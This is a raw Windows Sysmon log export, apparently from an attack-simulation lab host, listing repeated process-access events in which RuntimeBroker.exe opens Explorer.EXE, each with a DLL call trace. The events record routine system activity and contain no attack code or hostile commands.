13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac 10341000x800000000000000013110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe 10341000x800000000000000013107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac 10341000x800000000000000013102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe 10341000x800000000000000013099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac 10341000x800000000000000013094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 